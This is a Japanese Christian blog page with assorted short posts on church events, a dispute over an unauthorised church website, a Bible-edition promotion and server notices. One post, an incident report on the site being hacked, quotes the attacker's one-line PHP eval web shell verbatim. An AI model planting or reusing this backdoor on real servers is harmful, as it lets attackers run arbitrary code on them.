Utility

Calendar

< 2019.8 >
S M T W T F S
- - - - 1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31
- - - - - - -

WORLD CLOCK

COUNTER

    Access.....
    Yesterday......
    Today.............

KF_SITE

FOR MEMBERS

KF_PODCAST

YOUTUBE ARCHIVE

OUR WORSHIP

TWITTER UPDATE

INSTAGRAM UPDATE

PRAY FOR ISRAEL

KINGDOM FAITH(UK)

NEW LIFE CHURCH(UK)

QRcode

BIBLE SEARCH

Entry Search

Recent Entry

Recent Comment

未承認
2017/08/07 18:42 未承認
Re:聖書をキリスト教から解放せよ!
2015/04/22 09:49 菊千代
Re:「当たり前」が崩れる時代
2015/04/20 07:42 Luke
Re:出版への状況
2015/04/20 07:41 Luke
Re:出版への状況
2015/04/19 21:55 toshi

Recent Trackback

PJ 高橋清隆氏の記事が出ていました。
2008/06/25 20:45 AAA植草一秀氏を応援するブログAAA
負のレガシー
2008/06/18 16:03 リチャードの日記
キリスト者とインターネット
2008/06/18 09:21 キリスト教 プロテスタント 聖書 信仰
キリスト者とインターネット
2008/06/18 09:12 キリスト教 プロテスタント 聖書 信仰
産声を上げたKFC、、、、、
2008/05/05 12:10 thelongstreamingully

タグ一覧

Link

Entry

トップ > 告知

TODAY'S CELEBRATION 【Apr 19, 2015】

UPしました。

タイトル偽りを拒絶し広いところに立つ

聖書箇所:2コリント3:15-18;6:11-13;詩篇18:19など

4月26日のセレブ

参加ご希望の方はこちらまでどうぞ:info@kingdomfellowship.com

お知らせ
現在、NTTサーバーの仕様が変わり、このブログのスクリプトが対応できなくなっております。そこでここはそのまま残して、移転いたします。よろしくお願いします。

・新しいブログ(2015.04-2017.03)⇒Dr.LUKE'S iDLE UTTERANCE
・最新のブログ(2017.03- present)⇒Dr.LUKE'S iDLE UTTERANCE

サイトのイメージチェンジ

Kingdom FellowshipのWebsiteのイメチェンをはかりました。

なお、http;//www.kingdomfellowship.com/frame.htmlで入りますと従来どおりです。

奈良訪問の楽しみ

ファイル 4251-1.jpg

今朝もなんというシアワセ。朝の燦々と輝く光と、森の陰イオンにフィトンチッド、そして鶯の声と。これこそ贅沢の極みだ。

さて、今月はKingdom Fellowship Celebrationを18日に予定しているが*1、その前に9-11日は奈良のSalt氏のChapter29にお招きをいただいた。奈良訪問は2008年8月以来。実に楽しみである。内容としては2013年3月の特別対談「アー・ユー・ハッピー」の続きとなるようだが、何しろこの私のこと、どんなところに話が飛ぶかはまったく分からないわけで・・・。Salt氏のご案内をこちらでも紹介させていただこう:

と き 5月10日(土)

今回は、横浜からLukeさんが遊びに来られます。

10:30〜12:00 Saltと銀じ郎の信仰放談 テーマは「神の義」
12:00〜14:00 昼食&休憩 気まぐれで名張方面のレストランへ
14:00〜17:00 フリーな交わり

ところ 室生振興センター・会議室(近鉄室生口大野駅前スグ)他

(特別企画) 
18:00〜   Saltの隠れ家、某ゲストハウス(写真)にての交わり
19:00〜20:00 春の信仰放談スペシャル テーマ「霊・魂・体」
            ゲスト Dr.Luke

こちらに参加ご希望の方は、お知らせください。宿泊も可能です。

ご連絡は、@kcn.jp まで。 (@の前にsaltをつけてください。)

Salt氏の隠れ家と日曜日の奈良散策も楽しみにしている次第。みなさま、よろしく!&楽しい連休を!

*1:土日はゆっくりしたいので、まあ、月2回ペースでと思っているところ。毎週主日礼拝出席厳守とか、考えただけでゾッとするのだ。

  • ニッポンキリスト教の七不思議

  • お知らせとご注意

    すでにここでも数回にわたり告知しておりますが*1、「Kingdom Fellowship Church 公式サイト(http://kingdomfellowship.webnode.jp)」に関しましては、現在Dr.Lukeと一切の関係がありません。しかしながら、メッセンジャーは実名や身分を秘匿したまま活動を行っており、私や英国KingdomfaithColin Urquhartとの関係(Covenant Relationship)があるかのように装っておりますのでご注意ください。

    もともとこの「公式サイト」は私の承認と許諾なく作られましたが、彼らが独立するまでの過渡期として暫定的に2013年12月末を限度として黙認しておりました。現状では遺憾ながら違法状態におかれております。またそのサイトに掲載されているメールアドレスや電話はすべてあちら側に繋がりますが、Dr.Luke宛の連絡方法は従来通りですのでご注意ください。またチャペルの住所も記載されておりますが、すでにお知らせしましたとおり、現状私たちはそこでの活動はしておりませんので、合わせてご注意ください*2

    彼らに対しては、神からの大きな素晴らしいビジョンを与えられた者として、あれだけ立派なメッセージもしているのならば、KingdomFellowshipやColin Urquhartの看板に隠れることなく、堂々とご自分の名前で、神と諸霊と人々の前で証をして欲しいと思う次第。

    *1:端的に言えば、2013年1月初旬、クーデターが起き、Dr.Lukeが一切の働きを封じられて追放されたわけ。
    *2:チャペルに関してはそのまま彼らが使用したいとのことで、2013年9月末に私の契約解除を申し入れ、12月に彼らが契約することになっており、不動産屋との交渉も開始されておりましたが、12月になり彼らは突如チャペルから逃亡しました。こちらからと不動産屋の連絡に対しても一切の応答はなく(携帯もメールも遮断)、よって契約の意思なしとして、チャペルは契約解除され、もちろん彼らの契約下にはありません。よって「公式サイト」の記載は偽りですので、私宛の来訪者が一部おられるようですが、ご注意ください。

    お詫び

    昨晩からサーバーが落ちておりました。現在は復旧しております。

    ハッキングの記録

    昨晩、午前0時47分前後に、このサーバーは中国ドメインのIPからのアクセスによりハッキングされた模様。1111111なるメッセージとphpのファイルがUPされていた。phpファイルの内容は

    <?php @eval($_POST['a']);?>

    なる単純なものであるが、何を目論んでいるのだろうか?それにしてもここをハッキングしても何も得られるものはないと思うのだが・・・・。

    PR:内海信彦展

    過去にも何度か紹介しているが、今年もわが同僚の異色の画家、内海信彦氏の個展が行われる。

    内海信彦展
    The Innescape Series with methods of Ink flow painting

    および

    【対談】現代日本社会の格闘と解放の思想
    画家内海信彦氏と国際政治学者五野井郁夫氏

    ●時:6月17日~29日
    ●処:GalleryK、東京都中央区京橋3-9-7京橋ポイントビル4F、03-3563-4578
    ●費:一般千円、学生五百円、要予約

    お知らせ

    Dr.Lukeミニストリーもこの3月10日で15年目を迎えます。これまでDr.LukeのミニストリーとKingdom Fellowship Churchとはほぼ重なっていましたが、すでにメッセンジャーも与えられ、地域に現れた可視的エクレシアとしての自律的活動が始まっています。元々個人のミニストリーと可視的な地域教会は別のものであり、たまたま個人のミニストリーによって地域教会が生み出されるのです。しかし交わりが成長するにつれ、個人のミニストリーヘの依存から脱皮して、自律的に成長、活動する存在となります。逆に言えば、いつまでも特定の個人の働きやメッセージに依存することは不健全であると言えます。このことは私自身のメッセージでも繰り返してきましたが、長年の願いでありました。

    そこでKFCの公式サイトを新たに設け、メッセンジャーの兄弟たちが運営する体制になりました*1。これまでのサイトは元々の私個人のDr.Luke's Ministriesに戻ります。両サイトから互いに行き来することは自由にできますし、メッセージやウォッチマン・ニーの黙想などはどちらでもDLと視聴が可能です。なかなか面白いサイトと各メッセンジャーのブログができました。メッセンジャーの自己紹介もありまして、個性豊かな発言が期待できます。URLはこちらになります。主に大いに用いられることを期待します:

    *1:牧師制度や教職制度などは聖書にはありません。すべての肢体は兄弟姉妹であり、唯一の師はキリストのみです。互いに主から得たものを分かち合うことが交わりであり、メッセージでもあるのです。Dr.Lukeを偽牧師とする向きがニッポンキリスト教にはありますが、元々私は偽牧師だと言っておるところ(パスターとは牧の意味です)。つまりいわゆるニッポンキリスト教的牧師などではまったくないのです。いかに牧師制度や教職制度が互いの交わり(コイノニア)を阻害しているかが、現在のニッポンキリスト教の有様をみると分かることでしょう。資格は教団や理事会から得るものではなく、神から来るものです。それは御霊によるアノインティング(油塗り)に他なりません。

    何事かを自分のしたことと考える資格が私たち自身にあるというのではありません。私たちの資格は神からのものです。-2Cor 3:5

    お知らせ

    メッセージ配信の専用ブログを設置しました。移転作業も完了し、次のURLにて過去のものもすべてDLできます。iTunesでのPodcastも可能です。

    またここはDr.Lukeの与太話(iDLE UTTERANCE)のブログですが、KFCのメッセンジャーの兄弟たちがcoming outしてメッセージを提供するブログも新たに設けました。何が出てくるか楽しみです。

    お知らせ

    このブログのアドレス、

    は時に接続しにくい状態になるようです。

    は常に正常です。よろしくお願いします。

    *   *   *

    最近、聖書の写本をめぐっていろいろと議論が活発になっているが、面白い聖書を見つけました。その名も

    ちょっと驚いたのは、新約聖書原本はギリシャ語ではなく、アラム語で書かれたいたとのこと。ちょっと紹介文を引用しておきましょう:

    ファイル 3173-1.jpg

    THIS IS MORE AMAZING THAN THE DEAD SEA SCROLLS !

    Here for the very first time is a literal translation of the scriptures with the sacred name of Yahweh and Yahshua, restored and preserved. We have just finished printing the brand new second edition of the Hebraic Roots Bible that is now filled with thousands of study notes and even color maps and a topical concordance in the back.

    Did you know in every bible translation including the King James Bible that our Heavenly Father's personal name Yahweh has been taken out and replaced with titles and even names of pagan deities more than 10,000 times?

    This complete bible also has the New Testament based on the original Aramaic Peshitta text, the very language that our Savior spoke. The original New Testament was not written in Greek, but Aramaic. This is a literal translation and we believe to be the closest bible to the original language that was written thousands of years ago; The Old Testament is from the original Hebrew manuscripts and the NT from the original Aramaic.

    このページには従来の訳との異同が指摘されているが、ちょっとびっくりするものもある。例えば、ラクダが針の穴をとおる喩え。これは「ラクダ」ではなく、「太いロープ」だとか。マルコ14:3の「らい病人シモン」は「陶器師シモン」。イザヤ62:11の「救いが来る」は「イエシュアが来る」といった具合だ。製本版もあるようだが、pdfでDLし、現在1500ページ以上を印刷中。ありがたいことにe-Swordファイルもあるではないか!

    ドイツで"Mein Kampf"がリバイバル

    そう、言わずと知れた、ヒットラーの著作だ。学校の教材となった・・・。

    ドイツでは次のような映画も制作されている。反ユダヤ主義も蔓延し、実にヤバイ空気だ。

    お詫びとお知らせ

    現在、セキュリティ・アップのためNameサーバー/DNSサーバーを調整中ですので、時々にアクセスができなくなることがあります。よろしくご了承ください。特に、なぜかhttp://drlukeblog.kingdomfellowship.com/で入りにくくなっております。

    追記:無事、巡航モードに復帰しました

    *   *   *

    本日は午前中はプールとサウナ、午後は・・・・うーん、確定申告と納税。一言、疲れた・・・よって書く気力なし。この国は生かさず殺さず、ひたすら税という重石を・・・。

    Page

    Access: /Yesterday: /Today: